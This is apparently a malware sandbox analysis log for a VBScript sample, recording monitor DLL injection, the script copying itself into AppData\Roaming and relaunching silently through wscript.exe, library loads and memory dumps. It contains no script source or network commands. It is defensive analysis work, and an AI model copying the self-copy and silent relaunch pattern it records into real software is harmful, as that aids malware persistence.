Analysis

Category Package Started Completed Duration Options Log
FILE vbs 2019-09-11 13:38:44 2019-09-11 13:42:45 241 seconds Show Options Show Log
route = internet
procdump = 1
2019-09-11 14:38:45,000 [root] INFO: Date set to: 09-11-19, time set to: 13:38:45, timeout set to: 200
2019-09-11 14:38:45,062 [root] DEBUG: Starting analyzer from: C:\ttdrm
2019-09-11 14:38:45,062 [root] DEBUG: Storing results at: C:\QnnyUFjf
2019-09-11 14:38:45,062 [root] DEBUG: Pipe server name: \\.\PIPE\ooRSXWph
2019-09-11 14:38:45,062 [root] INFO: Analysis package "vbs" has been specified.
2019-09-11 14:38:46,029 [root] DEBUG: Started auxiliary module Browser
2019-09-11 14:38:46,029 [root] DEBUG: Started auxiliary module Curtain
2019-09-11 14:38:46,029 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2019-09-11 14:38:46,605 [modules.auxiliary.digisig] DEBUG: File format not recognized.
2019-09-11 14:38:46,605 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2019-09-11 14:38:46,605 [root] DEBUG: Started auxiliary module DigiSig
2019-09-11 14:38:46,605 [root] DEBUG: Started auxiliary module Disguise
2019-09-11 14:38:46,605 [root] DEBUG: Started auxiliary module Human
2019-09-11 14:38:46,605 [root] DEBUG: Started auxiliary module Screenshots
2019-09-11 14:38:46,605 [root] DEBUG: Started auxiliary module Sysmon
2019-09-11 14:38:46,605 [root] DEBUG: Started auxiliary module Usage
2019-09-11 14:38:46,605 [root] INFO: Analyzer: Package modules.packages.vbs does not specify a DLL option
2019-09-11 14:38:46,605 [root] INFO: Analyzer: Package modules.packages.vbs does not specify a DLL_64 option
2019-09-11 14:38:46,653 [lib.api.process] INFO: Successfully executed process from path "C:\Windows\system32\wscript.exe" with arguments ""C:\Users\user\AppData\Local\Temp\TrlLRLG2Z1SYOAj.vbs"" with pid 2008
2019-09-11 14:38:46,668 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-09-11 14:38:46,668 [lib.api.process] INFO: 32-bit DLL to inject is C:\ttdrm\dll\NUBUmr.dll, loader C:\ttdrm\bin\WFvksDY.exe
2019-09-11 14:38:46,684 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\ooRSXWph.
2019-09-11 14:38:46,684 [root] DEBUG: Loader: Injecting process 2008 (thread 2092) with C:\ttdrm\dll\NUBUmr.dll.
2019-09-11 14:38:46,684 [root] DEBUG: Process image base: 0x003B0000
2019-09-11 14:38:46,684 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ttdrm\dll\NUBUmr.dll.
2019-09-11 14:38:46,700 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x003D6000 - 0x77380000
2019-09-11 14:38:46,700 [root] DEBUG: InjectDllViaIAT: Allocated 0x1d8 bytes for new import table at 0x003E0000.
2019-09-11 14:38:46,700 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-09-11 14:38:46,700 [root] DEBUG: Successfully injected DLL C:\ttdrm\dll\NUBUmr.dll.
2019-09-11 14:38:46,700 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2008
2019-09-11 14:38:48,711 [lib.api.process] INFO: Successfully resumed process with pid 2008
2019-09-11 14:38:48,711 [root] INFO: Added new process to list with pid: 2008
2019-09-11 14:38:48,727 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-09-11 14:38:48,727 [root] DEBUG: Process dumps enabled.
2019-09-11 14:38:48,759 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-09-11 14:38:48,759 [root] INFO: Disabling sleep skipping.
2019-09-11 14:38:48,759 [root] INFO: Disabling sleep skipping.
2019-09-11 14:38:48,759 [root] INFO: Disabling sleep skipping.
2019-09-11 14:38:48,759 [root] INFO: Disabling sleep skipping.
2019-09-11 14:38:48,759 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2008 at 0x747a0000, image base 0x3b0000, stack from 0x386000-0x390000
2019-09-11 14:38:48,759 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Local\Temp\TrlLRLG2Z1SYOAj.vbs".
2019-09-11 14:38:48,759 [root] INFO: Monitor successfully loaded in process with pid 2008.
2019-09-11 14:38:48,775 [root] DEBUG: DLL unloaded from 0x77050000.
2019-09-11 14:38:48,775 [root] DEBUG: DLL unloaded from 0x003B0000.
2019-09-11 14:38:48,775 [root] DEBUG: DLL loaded at 0x74B30000: C:\Windows\SysWOW64\SXS (0x5f000 bytes).
2019-09-11 14:38:48,789 [root] DEBUG: DLL loaded at 0x75670000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-09-11 14:38:48,822 [root] DEBUG: DLL loaded at 0x74730000: C:\Windows\SysWOW64\vbscript (0x6b000 bytes).
2019-09-11 14:38:48,822 [root] DEBUG: DLL loaded at 0x76DD0000: C:\Windows\syswow64\WINTRUST (0x2d000 bytes).
2019-09-11 14:38:48,822 [root] DEBUG: DLL loaded at 0x76790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-09-11 14:38:48,836 [root] DEBUG: DLL loaded at 0x768B0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-09-11 14:38:48,836 [root] DEBUG: DLL loaded at 0x74F80000: C:\Windows\SysWOW64\CRYPTSP (0x16000 bytes).
2019-09-11 14:38:48,836 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-09-11 14:38:48,836 [root] DEBUG: DLL loaded at 0x74B20000: C:\Windows\SysWOW64\MSISIP (0x8000 bytes).
2019-09-11 14:38:48,836 [root] DEBUG: DLL unloaded from 0x76A70000.
2019-09-11 14:38:48,836 [root] DEBUG: DLL loaded at 0x74B00000: C:\Windows\SysWOW64\wshext (0x16000 bytes).
2019-09-11 14:38:48,836 [root] DEBUG: DLL loaded at 0x74BE0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\COMCTL32 (0x84000 bytes).
2019-09-11 14:38:48,836 [root] DEBUG: DLL loaded at 0x75B20000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2019-09-11 14:38:48,852 [root] DEBUG: DLL loaded at 0x74700000: C:\Windows\SysWOW64\scrobj (0x2d000 bytes).
2019-09-11 14:38:48,852 [root] DEBUG: DLL unloaded from 0x75760000.
2019-09-11 14:38:48,884 [root] DEBUG: DLL loaded at 0x745C0000: C:\Windows\System32\msxml3 (0x133000 bytes).
2019-09-11 14:38:48,930 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\SysWOW64\RpcRtRemote (0xe000 bytes).
2019-09-11 14:38:48,977 [root] DEBUG: DLL loaded at 0x744C0000: C:\Program Files (x86)\Common Files\System\ado\msado15 (0xf9000 bytes).
2019-09-11 14:38:49,009 [root] DEBUG: DLL loaded at 0x744A0000: C:\Windows\system32\MSDART (0x1f000 bytes).
2019-09-11 14:38:49,055 [root] DEBUG: DLL loaded at 0x74470000: C:\Windows\system32\mlang (0x2e000 bytes).
2019-09-11 14:38:49,071 [root] DEBUG: DLL loaded at 0x74440000: C:\Windows\SysWOW64\wshom.ocx (0x21000 bytes).
2019-09-11 14:38:49,071 [root] DEBUG: DLL loaded at 0x74420000: C:\Windows\SysWOW64\MPR (0x12000 bytes).
2019-09-11 14:38:49,086 [root] DEBUG: DLL loaded at 0x743F0000: C:\Windows\SysWOW64\ScrRun (0x2a000 bytes).
2019-09-11 14:38:49,118 [root] DEBUG: DLL loaded at 0x742F0000: C:\Windows\SysWOW64\PROPSYS (0xf5000 bytes).
2019-09-11 14:38:49,118 [root] DEBUG: DLL loaded at 0x74150000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-09-11 14:38:49,118 [root] DEBUG: DLL loaded at 0x74CB0000: C:\Windows\SysWOW64\apphelp (0x4c000 bytes).
2019-09-11 14:38:49,148 [root] DEBUG: DLL loaded at 0x731E0000: C:\Windows\SysWOW64\ieframe (0xa80000 bytes).
2019-09-11 14:38:49,164 [root] DEBUG: DLL loaded at 0x74110000: C:\Windows\SysWOW64\OLEACC (0x3c000 bytes).
2019-09-11 14:38:49,180 [root] DEBUG: DLL loaded at 0x76BD0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-09-11 14:38:49,211 [root] DEBUG: DLL loaded at 0x75530000: C:\Windows\syswow64\urlmon (0x136000 bytes).
2019-09-11 14:38:49,243 [root] DEBUG: DLL loaded at 0x75370000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-09-11 14:38:49,273 [root] DEBUG: DLL loaded at 0x758B0000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-09-11 14:38:49,273 [root] DEBUG: DLL loaded at 0x76A40000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-09-11 14:38:49,273 [root] DEBUG: DLL loaded at 0x76770000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-09-11 14:38:49,289 [root] DEBUG: DLL unloaded from 0x75B20000.
2019-09-11 14:38:49,289 [root] DEBUG: DLL loaded at 0x74BB0000: C:\Windows\SysWOW64\ntmarta (0x21000 bytes).
2019-09-11 14:38:49,289 [root] DEBUG: DLL loaded at 0x75860000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-09-11 14:38:49,305 [root] DEBUG: DLL loaded at 0x74100000: C:\Windows\SysWOW64\profapi (0xb000 bytes).
2019-09-11 14:38:49,335 [root] DEBUG: DLL unloaded from 0x003B0000.
2019-09-11 14:38:49,368 [root] INFO: Announced 32-bit process name: wscript.exe pid: 3012
2019-09-11 14:38:49,368 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-09-11 14:38:49,368 [lib.api.process] INFO: 32-bit DLL to inject is C:\ttdrm\dll\NUBUmr.dll, loader C:\ttdrm\bin\WFvksDY.exe
2019-09-11 14:38:49,368 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\ooRSXWph.
2019-09-11 14:38:49,368 [root] DEBUG: Loader: Injecting process 3012 (thread 1656) with C:\ttdrm\dll\NUBUmr.dll.
2019-09-11 14:38:49,368 [root] DEBUG: Process image base: 0x003B0000
2019-09-11 14:38:49,368 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ttdrm\dll\NUBUmr.dll.
2019-09-11 14:38:49,368 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x003D6000 - 0x77380000
2019-09-11 14:38:49,368 [root] DEBUG: InjectDllViaIAT: Allocated 0x1d8 bytes for new import table at 0x003E0000.
2019-09-11 14:38:49,368 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-09-11 14:38:49,368 [root] DEBUG: Successfully injected DLL C:\ttdrm\dll\NUBUmr.dll.
2019-09-11 14:38:49,368 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 3012
2019-09-11 14:38:49,368 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-09-11 14:38:49,368 [root] DEBUG: Process dumps enabled.
2019-09-11 14:38:49,368 [root] INFO: Disabling sleep skipping.
2019-09-11 14:38:49,382 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-09-11 14:38:49,382 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 3012 at 0x747a0000, image base 0x3b0000, stack from 0x286000-0x290000
2019-09-11 14:38:49,382 [root] DEBUG: DLL unloaded from 0x75B20000.
2019-09-11 14:38:49,382 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Windows\System32\wscript.exe" \B "C:\Users\user\AppData\Roaming\lXYOCrWYMY.vbs".
2019-09-11 14:38:49,382 [root] INFO: Added new process to list with pid: 3012
2019-09-11 14:38:49,382 [root] INFO: Monitor successfully loaded in process with pid 3012.
2019-09-11 14:38:49,382 [root] DEBUG: DLL unloaded from 0x77050000.
2019-09-11 14:38:49,382 [root] DEBUG: DLL unloaded from 0x003B0000.
2019-09-11 14:38:49,398 [root] DEBUG: DLL loaded at 0x74B30000: C:\Windows\SysWOW64\SXS (0x5f000 bytes).
2019-09-11 14:38:49,398 [root] DEBUG: DLL loaded at 0x75670000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-09-11 14:38:49,398 [root] DEBUG: DLL loaded at 0x74730000: C:\Windows\SysWOW64\vbscript (0x6b000 bytes).
2019-09-11 14:38:49,398 [root] DEBUG: DLL loaded at 0x76DD0000: C:\Windows\syswow64\WINTRUST (0x2d000 bytes).
2019-09-11 14:38:49,398 [root] DEBUG: DLL loaded at 0x76790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-09-11 14:38:49,398 [root] DEBUG: DLL loaded at 0x768B0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-09-11 14:38:49,398 [root] DEBUG: DLL loaded at 0x74F80000: C:\Windows\SysWOW64\CRYPTSP (0x16000 bytes).
2019-09-11 14:38:49,398 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-09-11 14:38:49,398 [root] DEBUG: DLL loaded at 0x74B20000: C:\Windows\SysWOW64\MSISIP (0x8000 bytes).
2019-09-11 14:38:49,398 [root] DEBUG: DLL unloaded from 0x76A70000.
2019-09-11 14:38:49,398 [root] DEBUG: DLL loaded at 0x74B00000: C:\Windows\SysWOW64\wshext (0x16000 bytes).
2019-09-11 14:38:49,398 [root] DEBUG: DLL loaded at 0x74BE0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\COMCTL32 (0x84000 bytes).
2019-09-11 14:38:49,398 [root] DEBUG: DLL loaded at 0x75B20000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2019-09-11 14:38:49,414 [root] DEBUG: DLL loaded at 0x74700000: C:\Windows\SysWOW64\scrobj (0x2d000 bytes).
2019-09-11 14:38:49,414 [root] DEBUG: DLL unloaded from 0x75760000.
2019-09-11 14:38:49,414 [root] DEBUG: DLL loaded at 0x745C0000: C:\Windows\System32\msxml3 (0x133000 bytes).
2019-09-11 14:38:49,414 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\SysWOW64\RpcRtRemote (0xe000 bytes).
2019-09-11 14:38:49,430 [root] DEBUG: DLL loaded at 0x744C0000: C:\Program Files (x86)\Common Files\System\ado\msado15 (0xf9000 bytes).
2019-09-11 14:38:49,430 [root] DEBUG: DLL loaded at 0x744A0000: C:\Windows\system32\MSDART (0x1f000 bytes).
2019-09-11 14:38:49,430 [root] DEBUG: DLL loaded at 0x74470000: C:\Windows\system32\mlang (0x2e000 bytes).
2019-09-11 14:38:49,430 [root] DEBUG: DLL loaded at 0x74440000: C:\Windows\SysWOW64\wshom.ocx (0x21000 bytes).
2019-09-11 14:38:49,430 [root] DEBUG: DLL loaded at 0x74420000: C:\Windows\SysWOW64\MPR (0x12000 bytes).
2019-09-11 14:38:49,430 [root] DEBUG: DLL loaded at 0x743F0000: C:\Windows\SysWOW64\ScrRun (0x2a000 bytes).
2019-09-11 14:38:49,446 [root] DEBUG: DLL loaded at 0x74150000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-09-11 14:38:49,446 [root] DEBUG: DLL loaded at 0x742F0000: C:\Windows\system32\propsys (0xf5000 bytes).
2019-09-11 14:38:49,446 [root] DEBUG: DLL loaded at 0x74BB0000: C:\Windows\SysWOW64\ntmarta (0x21000 bytes).
2019-09-11 14:38:49,446 [root] DEBUG: DLL loaded at 0x75860000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-09-11 14:38:49,460 [root] DEBUG: DLL loaded at 0x758B0000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-09-11 14:38:49,460 [root] DEBUG: DLL loaded at 0x76A40000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-09-11 14:38:49,460 [root] DEBUG: DLL loaded at 0x76770000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-09-11 14:38:49,507 [root] DEBUG: DLL unloaded from 0x75B20000.
2019-09-11 14:38:49,569 [root] DEBUG: DLL loaded at 0x74100000: C:\Windows\SysWOW64\profapi (0xb000 bytes).
2019-09-11 14:38:49,601 [root] DEBUG: DLL unloaded from 0x003B0000.
2019-09-11 14:38:49,601 [root] INFO: Announced 32-bit process name: wscript.exe pid: 2556
2019-09-11 14:38:49,601 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-09-11 14:38:49,601 [lib.api.process] INFO: 32-bit DLL to inject is C:\ttdrm\dll\NUBUmr.dll, loader C:\ttdrm\bin\WFvksDY.exe
2019-09-11 14:38:49,601 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\ooRSXWph.
2019-09-11 14:38:49,601 [root] DEBUG: Loader: Injecting process 2556 (thread 2868) with C:\ttdrm\dll\NUBUmr.dll.
2019-09-11 14:38:49,601 [root] DEBUG: Process image base: 0x003B0000
2019-09-11 14:38:49,601 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ttdrm\dll\NUBUmr.dll.
2019-09-11 14:38:49,601 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x003D6000 - 0x77380000
2019-09-11 14:38:49,601 [root] DEBUG: InjectDllViaIAT: Allocated 0x1d8 bytes for new import table at 0x003E0000.
2019-09-11 14:38:49,601 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-09-11 14:38:49,617 [root] DEBUG: Successfully injected DLL C:\ttdrm\dll\NUBUmr.dll.
2019-09-11 14:38:49,617 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2556
2019-09-11 14:38:49,617 [root] DEBUG: DLL unloaded from 0x75B20000.
2019-09-11 14:38:49,617 [root] DEBUG: DLL unloaded from 0x74440000.
2019-09-11 14:38:49,617 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-09-11 14:38:49,617 [root] DEBUG: DLL unloaded from 0x744C0000.
2019-09-11 14:38:49,617 [root] DEBUG: DLL unloaded from 0x744A0000.
2019-09-11 14:38:49,617 [root] DEBUG: Process dumps enabled.
2019-09-11 14:38:49,632 [root] DEBUG: DLL unloaded from 0x74700000.
2019-09-11 14:38:49,632 [root] INFO: Disabling sleep skipping.
2019-09-11 14:38:49,632 [root] DEBUG: DLL unloaded from 0x743F0000.
2019-09-11 14:38:49,632 [root] DEBUG: DLL unloaded from 0x75530000.
2019-09-11 14:38:49,632 [root] DEBUG: DLL unloaded from 0x742F0000.
2019-09-11 14:38:49,632 [root] DEBUG: DLL unloaded from 0x731E0000.
2019-09-11 14:38:49,632 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-09-11 14:38:49,632 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2556 at 0x747a0000, image base 0x3b0000, stack from 0x266000-0x270000
2019-09-11 14:38:49,632 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Windows\System32\wscript.exe" \B "C:\Users\user\AppData\Roaming\TrlLRLG2Z1SYOAj.vbs".
2019-09-11 14:38:49,632 [root] INFO: Added new process to list with pid: 2556
2019-09-11 14:38:49,632 [root] INFO: Monitor successfully loaded in process with pid 2556.
2019-09-11 14:38:49,632 [root] DEBUG: DLL unloaded from 0x77050000.
2019-09-11 14:38:49,632 [root] DEBUG: DLL unloaded from 0x003B0000.
2019-09-11 14:38:49,648 [root] DEBUG: DLL loaded at 0x75530000: C:\Windows\syswow64\urlmon (0x136000 bytes).
2019-09-11 14:38:49,648 [root] DEBUG: DLL unloaded from 0x77050000.
2019-09-11 14:38:49,648 [root] DEBUG: DLL loaded at 0x75370000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-09-11 14:38:49,648 [root] DEBUG: DLL unloaded from 0x74470000.
2019-09-11 14:38:49,648 [root] DEBUG: DLL loaded at 0x76BD0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-09-11 14:38:49,648 [root] DEBUG: DLL loaded at 0x74B30000: C:\Windows\SysWOW64\SXS (0x5f000 bytes).
2019-09-11 14:38:49,648 [root] DEBUG: DLL loaded at 0x75670000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-09-11 14:38:49,648 [root] DEBUG: DLL unloaded from 0x745C0000.
2019-09-11 14:38:49,648 [root] DEBUG: DLL unloaded from 0x74730000.
2019-09-11 14:38:49,648 [root] DEBUG: DLL loaded at 0x74730000: C:\Windows\SysWOW64\vbscript (0x6b000 bytes).
2019-09-11 14:38:49,664 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2008
2019-09-11 14:38:49,664 [root] DEBUG: GetHookCallerBase: thread 2092 (handle 0x0), return address 0x003B2FBD, allocation base 0x003B0000.
2019-09-11 14:38:49,664 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x003B0000.
2019-09-11 14:38:49,664 [root] DEBUG: DLL loaded at 0x76DD0000: C:\Windows\syswow64\WINTRUST (0x2d000 bytes).
2019-09-11 14:38:49,664 [root] DEBUG: DLL loaded at 0x76790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-09-11 14:38:49,664 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x003B0000.
2019-09-11 14:38:49,664 [root] DEBUG: DLL loaded at 0x768B0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-09-11 14:38:49,664 [root] DEBUG: DumpProcess: Module entry point VA is 0x00002F3B.
2019-09-11 14:38:49,664 [root] DEBUG: DLL loaded at 0x74F80000: C:\Windows\SysWOW64\CRYPTSP (0x16000 bytes).
2019-09-11 14:38:49,664 [root] DEBUG: DLL loaded at 0x752D0000: C:\Windows\syswow64\ws2_32 (0x35000 bytes).
2019-09-11 14:38:49,664 [root] INFO: Added new CAPE file to list with path: C:\QnnyUFjf\CAPE\2008_144026723259191711392019
2019-09-11 14:38:49,664 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-09-11 14:38:49,664 [root] DEBUG: DLL loaded at 0x75850000: C:\Windows\syswow64\NSI (0x6000 bytes).
2019-09-11 14:38:49,664 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x22a00.
2019-09-11 14:38:49,664 [root] DEBUG: DLL loaded at 0x74B20000: C:\Windows\SysWOW64\MSISIP (0x8000 bytes).
2019-09-11 14:38:49,664 [root] DEBUG: DLL unloaded from 0x76A70000.
2019-09-11 14:38:49,664 [root] DEBUG: DLL unloaded from 0x742F0000.
2019-09-11 14:38:49,680 [root] DEBUG: DLL loaded at 0x74B00000: C:\Windows\SysWOW64\wshext (0x16000 bytes).
2019-09-11 14:38:49,680 [root] DEBUG: DLL unloaded from 0x77050000.
2019-09-11 14:38:49,680 [root] DEBUG: DLL loaded at 0x74BE0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\COMCTL32 (0x84000 bytes).
2019-09-11 14:38:49,680 [root] DEBUG: DLL unloaded from 0x75700000.
2019-09-11 14:38:49,680 [root] DEBUG: DLL loaded at 0x74DB0000: C:\Windows\SysWOW64\dnsapi (0x44000 bytes).
2019-09-11 14:38:49,680 [root] DEBUG: DLL loaded at 0x75B20000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2019-09-11 14:38:49,680 [root] DEBUG: DLL unloaded from 0x74BB0000.
2019-09-11 14:38:49,680 [root] DEBUG: DLL loaded at 0x74130000: C:\Windows\SysWOW64\iphlpapi (0x1c000 bytes).
2019-09-11 14:38:49,680 [root] INFO: Notified of termination of process with pid 2008.
2019-09-11 14:38:49,680 [root] DEBUG: DLL loaded at 0x74700000: C:\Windows\SysWOW64\scrobj (0x2d000 bytes).
2019-09-11 14:38:49,680 [root] DEBUG: DLL loaded at 0x74120000: C:\Windows\SysWOW64\WINNSI (0x7000 bytes).
2019-09-11 14:38:49,680 [root] DEBUG: DLL unloaded from 0x75760000.
2019-09-11 14:38:49,680 [root] DEBUG: DLL loaded at 0x745C0000: C:\Windows\System32\msxml3 (0x133000 bytes).
2019-09-11 14:38:49,694 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\SysWOW64\RpcRtRemote (0xe000 bytes).
2019-09-11 14:38:49,710 [root] DEBUG: DLL loaded at 0x744C0000: C:\Program Files (x86)\Common Files\System\ado\msado15 (0xf9000 bytes).
2019-09-11 14:38:49,710 [root] DEBUG: DLL loaded at 0x744A0000: C:\Windows\system32\MSDART (0x1f000 bytes).
2019-09-11 14:38:49,710 [root] DEBUG: DLL loaded at 0x74470000: C:\Windows\system32\mlang (0x2e000 bytes).
2019-09-11 14:38:49,726 [root] INFO: Process with pid 2008 has terminated
2019-09-11 14:38:49,726 [root] DEBUG: DLL loaded at 0x74440000: C:\Windows\SysWOW64\wshom.ocx (0x21000 bytes).
2019-09-11 14:38:49,726 [root] DEBUG: DLL loaded at 0x74420000: C:\Windows\SysWOW64\MPR (0x12000 bytes).
2019-09-11 14:38:49,726 [root] DEBUG: DLL loaded at 0x740C0000: C:\Windows\system32\wbem\wbemdisp (0x31000 bytes).
2019-09-11 14:38:49,726 [root] DEBUG: DLL loaded at 0x743F0000: C:\Windows\SysWOW64\ScrRun (0x2a000 bytes).
2019-09-11 14:38:49,742 [root] DEBUG: DLL loaded at 0x74060000: C:\Windows\system32\wbemcomn (0x5c000 bytes).
2019-09-11 14:38:49,773 [root] DEBUG: DLL loaded at 0x73F80000: C:\Program Files (x86)\Common Files\System\Ole DB\oledb32 (0xd4000 bytes).
2019-09-11 14:38:49,789 [root] DEBUG: DLL loaded at 0x73F60000: C:\Windows\system32\bcrypt (0x17000 bytes).
2019-09-11 14:38:49,819 [root] DEBUG: DLL loaded at 0x74150000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\Comctl32 (0x19e000 bytes).
2019-09-11 14:38:49,819 [root] DEBUG: DLL loaded at 0x73F40000: C:\Program Files (x86)\Common Files\System\Ole DB\OLEDB32R (0x14000 bytes).
2019-09-11 14:38:49,835 [root] DEBUG: DLL loaded at 0x73F20000: C:\Program Files (x86)\Common Files\System\ado\msader15 (0x2000 bytes).
2019-09-11 14:38:49,851 [root] DEBUG: DLL loaded at 0x742F0000: C:\Windows\SysWOW64\PROPSYS (0xf5000 bytes).
2019-09-11 14:38:49,867 [root] DEBUG: DLL loaded at 0x74CB0000: C:\Windows\SysWOW64\apphelp (0x4c000 bytes).
2019-09-11 14:38:49,867 [root] DEBUG: DLL loaded at 0x72760000: C:\Windows\SysWOW64\ieframe (0xa80000 bytes).
2019-09-11 14:38:49,867 [root] DEBUG: DLL loaded at 0x73EA0000: C:\Windows\SysWOW64\OLEACC (0x3c000 bytes).
2019-09-11 14:38:49,867 [root] DEBUG: DLL loaded at 0x76BD0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-09-11 14:38:49,881 [root] DEBUG: DLL loaded at 0x75530000: C:\Windows\syswow64\urlmon (0x136000 bytes).
2019-09-11 14:38:49,881 [root] DEBUG: DLL loaded at 0x75370000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-09-11 14:38:49,898 [root] DEBUG: DLL loaded at 0x74BB0000: C:\Windows\SysWOW64\ntmarta (0x21000 bytes).
2019-09-11 14:38:49,898 [root] DEBUG: DLL loaded at 0x75860000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-09-11 14:38:49,898 [root] DEBUG: DLL loaded at 0x74100000: C:\Windows\SysWOW64\profapi (0xb000 bytes).
2019-09-11 14:38:49,914 [root] DEBUG: DLL loaded at 0x758B0000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-09-11 14:38:49,914 [root] DEBUG: DLL loaded at 0x76A40000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-09-11 14:38:49,944 [root] DEBUG: DLL loaded at 0x76770000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-09-11 14:38:49,960 [root] DEBUG: DLL unloaded from 0x003B0000.
2019-09-11 14:38:49,960 [root] INFO: Announced 32-bit process name: wscript.exe pid: 1052
2019-09-11 14:38:49,960 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-09-11 14:38:49,960 [lib.api.process] INFO: 32-bit DLL to inject is C:\ttdrm\dll\NUBUmr.dll, loader C:\ttdrm\bin\WFvksDY.exe
2019-09-11 14:38:49,960 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\ooRSXWph.
2019-09-11 14:38:49,960 [root] DEBUG: Loader: Injecting process 1052 (thread 1900) with C:\ttdrm\dll\NUBUmr.dll.
2019-09-11 14:38:49,976 [root] DEBUG: Process image base: 0x003B0000
2019-09-11 14:38:49,976 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ttdrm\dll\NUBUmr.dll.
2019-09-11 14:38:49,976 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x003D6000 - 0x77380000
2019-09-11 14:38:49,976 [root] DEBUG: InjectDllViaIAT: Allocated 0x1d8 bytes for new import table at 0x003E0000.
2019-09-11 14:38:49,976 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-09-11 14:38:49,992 [root] DEBUG: Successfully injected DLL C:\ttdrm\dll\NUBUmr.dll.
2019-09-11 14:38:49,992 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1052
